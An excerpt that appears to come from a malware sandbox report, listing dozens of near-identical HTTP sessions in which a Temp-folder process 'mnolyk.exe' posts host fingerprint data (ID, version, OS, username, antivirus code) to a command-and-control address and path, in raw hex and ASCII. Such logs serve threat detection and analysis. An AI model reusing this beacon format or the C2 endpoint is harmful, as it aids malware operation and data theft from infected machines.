                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      327 | 192.168.2.7 | 50055 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:27.766284943 CET | 787 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.832042933 CET | 787 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      328 | 192.168.2.7 | 50056 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:28.014709949 CET | 787 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.082096100 CET | 788 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      329 | 192.168.2.7 | 50057 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:28.262419939 CET | 789 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.327377081 CET | 789 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      33 | 192.168.2.7 | 49757 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:05.614238024 CET | 464 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.678282976 CET | 465 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      330 | 192.168.2.7 | 50058 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:28.499164104 CET | 790 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.563302040 CET | 790 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      331 | 192.168.2.7 | 50059 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:28.737025976 CET | 791 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.802062035 CET | 791 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      332 | 192.168.2.7 | 50060 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:28.997104883 CET | 792 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.066272020 CET | 792 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      333 | 192.168.2.7 | 50061 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:29.246155977 CET | 792 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.310091972 CET | 793 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      334 | 192.168.2.7 | 50062 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:29.485224962 CET | 794 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.549381971 CET | 794 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      335 | 192.168.2.7 | 50063 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:29.786602974 CET | 795 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.851991892 CET | 795 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      336 | 192.168.2.7 | 50064 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:30.054049969 CET | 796 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:30.121550083 CET | 796 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      337 | 192.168.2.7 | 50065 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:30.338042974 CET | 797 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:30.403852940 CET | 797 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      338 | 192.168.2.7 | 50066 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:30.995908022 CET | 798 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:31.059571981 CET | 798 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      339 | 192.168.2.7 | 50067 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:31.325633049 CET | 799 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:31.389426947 CET | 799 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      34 | 192.168.2.7 | 49758 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:05.847455978 CET | 466 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.912489891 CET | 466 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      340 | 192.168.2.7 | 50068 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:32.325881958 CET | 800 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:32.394088030 CET | 800 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      341 | 192.168.2.7 | 50069 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:32.561893940 CET | 801 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:32.625941038 CET | 801 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      342 | 192.168.2.7 | 50070 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:32.801482916 CET | 802 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:32.867610931 CET | 802 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      343 | 192.168.2.7 | 50071 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:33.042572021 CET | 803 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
